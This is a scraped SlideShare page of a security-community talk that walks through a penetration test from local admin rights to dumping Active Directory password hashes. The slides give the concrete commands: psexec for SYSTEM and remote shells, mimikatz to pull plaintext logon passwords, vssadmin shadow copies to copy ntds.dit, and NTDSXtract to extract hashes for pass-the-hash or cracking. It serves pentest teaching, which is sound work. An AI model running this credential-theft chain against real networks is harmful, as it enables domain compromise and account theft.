SlideShare une entreprise Scribd logo

Fall of a domain | From local admin to Domain user hashes

Télécharger en tant que PPTX, PDF
n|u - The Open Security Community
n|u - The Open Security Community

Author: Riyaz Walikar

Technologie
1  sur  23
The Fall of a Domain LOCAL ADMIN TO DOMAIN USER HASHES Riyaz Walikar
Disclaimer  It was far more painstaking and complicated than this!  Demo setup to show execution path  All the commands were actually used in the pentest  Please do not try this on your office/corporate environment without written permission
Please exercise caution!
The story so far  Remote RDP access to a machine on the client network via VPN  Local Administrator rights to simulate an employee  User is a limited domain user  Domain controller on the same network, reachable with LDAP services running
Visually. This.
Local Admin eh?  Locally logged in as TARDISfwhite  Domain limited user but local admin  Other users connected? [Task Manager > Users]  Found another user connected to our system via RDP –sweet! (possibly domain admin )  Need system privs! Any ideas?
Think Sysinternals!  psexec –s –i cmd.exe
Dump connected user credentials  mimikatz – Benjamin Delpy  Extracts plaintext passwords from memory  Wdigest, tspkg, kerberos and many more  mimikatz  privilege::debug  token::elevate  sekurlsa::logonPasswords
Windows (In)Security?
Now what? http://gapingvoid.com/2008/06/13/now-what/
Remote CMD anyone?  RDP directly!  Lets be discreet   psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe  Game already over!  Instead RDP with user credentials and present report
Lets grab some hashes   Active Directory stores user information in %systemroot%ntdsntds.dit  Locked during system usage  ntdsutil + snapshot = backup (> Windows 2008)  vssadmin create shadow /for=C: (> Windows 2003)
Lets grab some hashes   backup readable by nt authoritysystem and administrators  We need the ntds.dit and SYSTEM files  cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies  copy works!
Core files needed
NTDS.dit structure parse?  NTDSXtract - A framework for offline forensic analysis of ntds.dit  Need the libesedb module as well  libesedb and creddump in ntds_dump_hashes.zip  wget to a linux box (Kali is a good choice)
get framework + compile + make + run  wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt ract_v1_0.zip  wget http://ntdsxtract.com/downloads/ntds_dump_hash .zip  unzip both
get framework + compile + make + run  cd ntds_dump_hash/libesedb  ./configure && make  cd libesedb/esedbtools  ./esedbexport -l /tmp/ntds.log <ntds.dit>
Yay!  python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> – passwordhistory <system_file>  Cleanup the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/mas ter/ntdstopwdump.py)
Now what? http://gapingvoid.com/2008/06/13/now-what/
Pass the hash / Password Cracking!  Use the Windows Credentials Editor – Amplia Security  Password Cracking >> Humla perhaps 
References  http://blog.gentilkiwi.com/mimikatz  http://www.ampliasecurity.com/research/wcefaq.ht ml  http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html
Thank you riyazwalikar@gmail.com http://www.riyazwalikar.com

Recommandé

Lavigne bsdmag apr13
Lavigne bsdmag apr13Lavigne bsdmag apr13
Lavigne bsdmag apr13
Dru Lavigne
 
Cs 704 D Aos Distr File System
Cs 704 D Aos Distr File SystemCs 704 D Aos Distr File System
Cs 704 D Aos Distr File System
Debasis Das
 
Asiabsdcon14
Asiabsdcon14Asiabsdcon14
Asiabsdcon14
Dru Lavigne
 
Xen and Art of Virtualization (Xen Architecture)
Xen and Art of Virtualization (Xen Architecture)Xen and Art of Virtualization (Xen Architecture)
Xen and Art of Virtualization (Xen Architecture)
Mr Cracker
 
Server operating system
Server operating systemServer operating system
Server operating system
Tapan Khilar
 
Virtualization session 2
Virtualization session 2Virtualization session 2
Virtualization session 2
Navaneethan Naveen
 
Zenoss presentation (nur nabilah hassan)
Zenoss presentation (nur nabilah hassan)Zenoss presentation (nur nabilah hassan)
Zenoss presentation (nur nabilah hassan)
Nur Nabilah Hassan
 
Lowest Storage Cost per Desktop with NetApp without any Tradeoffs
Lowest Storage Cost per Desktop with NetApp without any TradeoffsLowest Storage Cost per Desktop with NetApp without any Tradeoffs
Lowest Storage Cost per Desktop with NetApp without any Tradeoffs
NetApp
 

Recommandé

Lavigne bsdmag apr13
Lavigne bsdmag apr13Lavigne bsdmag apr13
Lavigne bsdmag apr13
Dru Lavigne
 
Cs 704 D Aos Distr File System
Cs 704 D Aos Distr File SystemCs 704 D Aos Distr File System
Cs 704 D Aos Distr File System
Debasis Das
 
Asiabsdcon14
Asiabsdcon14Asiabsdcon14
Asiabsdcon14
Dru Lavigne
 
Xen and Art of Virtualization (Xen Architecture)
Xen and Art of Virtualization (Xen Architecture)Xen and Art of Virtualization (Xen Architecture)
Xen and Art of Virtualization (Xen Architecture)
Mr Cracker
 
Server operating system
Server operating systemServer operating system
Server operating system
Tapan Khilar
 
Virtualization session 2
Virtualization session 2Virtualization session 2
Virtualization session 2
Navaneethan Naveen
 
Zenoss presentation (nur nabilah hassan)
Zenoss presentation (nur nabilah hassan)Zenoss presentation (nur nabilah hassan)
Zenoss presentation (nur nabilah hassan)
Nur Nabilah Hassan
 
Lowest Storage Cost per Desktop with NetApp without any Tradeoffs
Lowest Storage Cost per Desktop with NetApp without any TradeoffsLowest Storage Cost per Desktop with NetApp without any Tradeoffs
Lowest Storage Cost per Desktop with NetApp without any Tradeoffs
NetApp
 
IBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceIBM Traveler Management, Security and Performance
IBM Traveler Management, Security and Performance
Gabriella Davis
 
Practical Introduction To Linux
Practical Introduction To LinuxPractical Introduction To Linux
Practical Introduction To Linux
Zeeshan Rizvi
 
HDFS Basics
HDFS BasicsHDFS Basics
HDFS Basics
NIVASH RAMAJAYAM
 
Xen & the Art of Virtualization
Xen & the Art of VirtualizationXen & the Art of Virtualization
Xen & the Art of Virtualization
Tareque Hossain
 
P3
P3P3
P3
NANA-BASH
 
Makarand_sonawane_2.6yrexp
Makarand_sonawane_2.6yrexpMakarand_sonawane_2.6yrexp
Makarand_sonawane_2.6yrexp
Makarand Sonawane
 
Lavigne bsdmag march12
Lavigne bsdmag march12Lavigne bsdmag march12
Lavigne bsdmag march12
Dru Lavigne
 
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Виталий Стародубцев
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
kieranjacobsen
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShell
kieranjacobsen
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centre
kieranjacobsen
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
kieranjacobsen
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Ducky
kieranjacobsen
 
Glen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at TwitterGlen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at Twitter
9len
 
Http2 Security Perspective
Http2 Security PerspectiveHttp2 Security Perspective
Http2 Security Perspective
Sunil Kumar
 
Gospel of mark pt 1 session 02
Gospel of mark pt 1 session 02Gospel of mark pt 1 session 02
Gospel of mark pt 1 session 02
Darryl Matthews
 
Pentesting Cloud Environment
Pentesting Cloud EnvironmentPentesting Cloud Environment
Pentesting Cloud Environment
Vengatesh Nagarajan
 
Mehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsigMehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsig
3GDR
 
Windows server Interview question and answers
Windows server Interview question and answersWindows server Interview question and answers
Windows server Interview question and answers
Availity Fore Support Services pvt ltd
 
Managing Drupal on Windows with Drush
Managing Drupal on Windows with DrushManaging Drupal on Windows with Drush
Managing Drupal on Windows with Drush
Alessandro Pilotti
 
70-410 Practice Test
70-410 Practice Test70-410 Practice Test
70-410 Practice Test
wrailebo
 
DevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentDevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal Deployment
Gerald Villorente
 

Contenu connexe

Tendances

Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Виталий Стародубцев
 

Tendances (8)

IBM Traveler Management, Security and Performance
IBM Traveler Management, Security and PerformanceIBM Traveler Management, Security and Performance
IBM Traveler Management, Security and Performance
 
Practical Introduction To Linux
Practical Introduction To LinuxPractical Introduction To Linux
Practical Introduction To Linux
 
HDFS Basics
HDFS BasicsHDFS Basics
HDFS Basics
 
Xen & the Art of Virtualization
Xen & the Art of VirtualizationXen & the Art of Virtualization
Xen & the Art of Virtualization
 
P3
P3P3
P3
 
Makarand_sonawane_2.6yrexp
Makarand_sonawane_2.6yrexpMakarand_sonawane_2.6yrexp
Makarand_sonawane_2.6yrexp
 
Lavigne bsdmag march12
Lavigne bsdmag march12Lavigne bsdmag march12
Lavigne bsdmag march12
 
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
Технологии работы с дисковыми хранилищами и файловыми системами Windows Serve...
 

En vedette

Gospel of mark pt 1 session 02
Gospel of mark pt 1 session 02Gospel of mark pt 1 session 02
Gospel of mark pt 1 session 02
Darryl Matthews
 
Mehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsigMehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsig
3GDR
 

En vedette (10)

Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Exploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShellExploiting MS15-034 In PowerShell
Exploiting MS15-034 In PowerShell
 
Azure automation invades your data centre
Azure automation invades your data centreAzure automation invades your data centre
Azure automation invades your data centre
 
Lateral Movement with PowerShell
Lateral Movement with PowerShellLateral Movement with PowerShell
Lateral Movement with PowerShell
 
Fun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber DuckyFun with the Hak5 Rubber Ducky
Fun with the Hak5 Rubber Ducky
 
Glen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at TwitterGlen Sanford: Engineering for Real-Time at Twitter
Glen Sanford: Engineering for Real-Time at Twitter
 
Http2 Security Perspective
Http2 Security PerspectiveHttp2 Security Perspective
Http2 Security Perspective
 
Gospel of mark pt 1 session 02
Gospel of mark pt 1 session 02Gospel of mark pt 1 session 02
Gospel of mark pt 1 session 02
 
Pentesting Cloud Environment
Pentesting Cloud EnvironmentPentesting Cloud Environment
Pentesting Cloud Environment
 
Mehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsigMehta sv forum_mobileinternetsig
Mehta sv forum_mobileinternetsig
 

Similaire à Fall of a domain | From local admin to Domain user hashes

Automating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShellAutomating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShell
Concentrated Technology
 
UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70
UGIF
 
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Nicolas Desachy
 
Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10
Sean Hull
 
RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015
Diaa Radwan
 

Similaire à Fall of a domain | From local admin to Domain user hashes (20)

Windows server Interview question and answers
Windows server Interview question and answersWindows server Interview question and answers
Windows server Interview question and answers
 
Managing Drupal on Windows with Drush
Managing Drupal on Windows with DrushManaging Drupal on Windows with Drush
Managing Drupal on Windows with Drush
 
70-410 Practice Test
70-410 Practice Test70-410 Practice Test
70-410 Practice Test
 
DevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal DeploymentDevOps: Cooking Drupal Deployment
DevOps: Cooking Drupal Deployment
 
Project of deamon process
Project of deamon processProject of deamon process
Project of deamon process
 
Server 2008 r2 ppt
Server 2008 r2 pptServer 2008 r2 ppt
Server 2008 r2 ppt
 
Server Core2
Server Core2Server Core2
Server Core2
 
Automating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShellAutomating Active Directory mgmt in PowerShell
Automating Active Directory mgmt in PowerShell
 
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
WinConnections Spring, 2011 - How to Securely Connect Remote Desktop Services...
 
Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016Deploying Windows Containers on Windows Server 2016
Deploying Windows Containers on Windows Server 2016
 
CEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptxCEHv10 M0 Introduction.pptx
CEHv10 M0 Introduction.pptx
 
UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70UGIF 12 2010 - features11.70
UGIF 12 2010 - features11.70
 
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
Informix User Group France - 30/11/2010 - Fonctionalités IDS 11.7
 
Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10Oreilly Webcast 01 19 10
Oreilly Webcast 01 19 10
 
Docker Security workshop slides
Docker Security workshop slidesDocker Security workshop slides
Docker Security workshop slides
 
DFIR Training: RDP Triage
DFIR Training: RDP TriageDFIR Training: RDP Triage
DFIR Training: RDP Triage
 
Ctive directory interview question and answers
Ctive directory interview question and answersCtive directory interview question and answers
Ctive directory interview question and answers
 
linux
linuxlinux
linux
 
RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015RH_Summit_IdM_Lab_User_Guide_2015
RH_Summit_IdM_Lab_User_Guide_2015
 
Sistemas operacionais 8
Sistemas operacionais 8Sistemas operacionais 8
Sistemas operacionais 8
 

Plus de n|u - The Open Security Community

Plus de n|u - The Open Security Community (20)

Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)Hardware security testing 101 (Null - Delhi Chapter)
Hardware security testing 101 (Null - Delhi Chapter)
 
Osint primer
Osint primerOsint primer
Osint primer
 
SSRF exploit the trust relationship
SSRF exploit the trust relationshipSSRF exploit the trust relationship
SSRF exploit the trust relationship
 
Nmap basics
Nmap basicsNmap basics
Nmap basics
 
Metasploit primary
Metasploit primaryMetasploit primary
Metasploit primary
 
Api security-testing
Api security-testingApi security-testing
Api security-testing
 
Introduction to TLS 1.3
Introduction to TLS 1.3Introduction to TLS 1.3
Introduction to TLS 1.3
 
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
Gibson 101 -quick_introduction_to_hacking_mainframes_in_2020_null_infosec_gir...
 
Talking About SSRF,CRLF
Talking About SSRF,CRLFTalking About SSRF,CRLF
Talking About SSRF,CRLF
 
Building active directory lab for red teaming
Building active directory lab for red teamingBuilding active directory lab for red teaming
Building active directory lab for red teaming
 
Owning a company through their logs
Owning a company through their logsOwning a company through their logs
Owning a company through their logs
 
Introduction to shodan
Introduction to shodanIntroduction to shodan
Introduction to shodan
 
Cloud security
Cloud security Cloud security
Cloud security
 
Detecting persistence in windows
Detecting persistence in windowsDetecting persistence in windows
Detecting persistence in windows
 
Frida - Objection Tool Usage
Frida - Objection Tool UsageFrida - Objection Tool Usage
Frida - Objection Tool Usage
 
OSQuery - Monitoring System Process
OSQuery - Monitoring System ProcessOSQuery - Monitoring System Process
OSQuery - Monitoring System Process
 
DevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -SecurityDevSecOps Jenkins Pipeline -Security
DevSecOps Jenkins Pipeline -Security
 
Extensible markup language attacks
Extensible markup language attacksExtensible markup language attacks
Extensible markup language attacks
 
Linux for hackers
Linux for hackersLinux for hackers
Linux for hackers
 
Android Pentesting
Android PentestingAndroid Pentesting
Android Pentesting
 

Dernier

Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
panagenda
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Dernier (20)

Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
ICT role in 21st century education and its challenges
ICT role in 21st century education and its challengesICT role in 21st century education and its challenges
ICT role in 21st century education and its challenges
 
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin WoodPolkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...2024: Domino Containers - The Next Step. News from the Domino Container commu...
2024: Domino Containers - The Next Step. News from the Domino Container commu...
 
AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024AXA XL - Insurer Innovation Award Americas 2024
AXA XL - Insurer Innovation Award Americas 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost SavingRepurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
Repurposing LNG terminals for Hydrogen Ammonia: Feasibility and Cost Saving
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 

Fall of a domain | From local admin to Domain user hashes

  • 1. The Fall of a Domain LOCAL ADMIN TO DOMAIN USER HASHES Riyaz Walikar
  • 2. Disclaimer  It was far more painstaking and complicated than this!  Demo setup to show execution path  All the commands were actually used in the pentest  Please do not try this on your office/corporate environment without written permission
  • 4. The story so far  Remote RDP access to a machine on the client network via VPN  Local Administrator rights to simulate an employee  User is a limited domain user  Domain controller on the same network, reachable with LDAP services running
  • 6. Local Admin eh?  Locally logged in as TARDISfwhite  Domain limited user but local admin  Other users connected? [Task Manager > Users]  Found another user connected to our system via RDP –sweet! (possibly domain admin )  Need system privs! Any ideas?
  • 7. Think Sysinternals!  psexec –s –i cmd.exe
  • 8. Dump connected user credentials  mimikatz – Benjamin Delpy  Extracts plaintext passwords from memory  Wdigest, tspkg, kerberos and many more  mimikatz  privilege::debug  token::elevate  sekurlsa::logonPasswords
  • 11. Remote CMD anyone?  RDP directly!  Lets be discreet   psexec -s –u TARDISatomboy 10.10.10.1 cmd.exe  Game already over!  Instead RDP with user credentials and present report
  • 12.
  • 13. Lets grab some hashes   Active Directory stores user information in %systemroot%ntdsntds.dit  Locked during system usage  ntdsutil + snapshot = backup (> Windows 2008)  vssadmin create shadow /for=C: (> Windows 2003)
  • 14. Lets grab some hashes   backup readable by nt authoritysystem and administrators  We need the ntds.dit and SYSTEM files  cd / dir /other inbuilt cmd commands do not work on unmounted volume shadow copies  copy works!
  • 16. NTDS.dit structure parse?  NTDSXtract - A framework for offline forensic analysis of ntds.dit  Need the libesedb module as well  libesedb and creddump in ntds_dump_hashes.zip  wget to a linux box (Kali is a good choice)
  • 17. get framework + compile + make + run  wget http://ntdsxtract.com/downloads/ntdsxtract/ntdsxt ract_v1_0.zip  wget http://ntdsxtract.com/downloads/ntds_dump_hash .zip  unzip both
  • 18. get framework + compile + make + run  cd ntds_dump_hash/libesedb  ./configure && make  cd libesedb/esedbtools  ./esedbexport -l /tmp/ntds.log <ntds.dit>
  • 19. Yay!  python ../../ntdsxtract/dsusers.py datatable link_table --passwordhashes <system_file> – passwordhistory <system_file>  Cleanup the output with ntdstopwdump.py (https://raw.github.com/inquisb/miscellaneous/mas ter/ntdstopwdump.py)
  • 21. Pass the hash / Password Cracking!  Use the Windows Credentials Editor – Amplia Security  Password Cracking >> Humla perhaps 
  • 22. References  http://blog.gentilkiwi.com/mimikatz  http://www.ampliasecurity.com/research/wcefaq.ht ml  http://bernardodamele.blogspot.in/2011/12/dumpwindows-password-hashes_16.html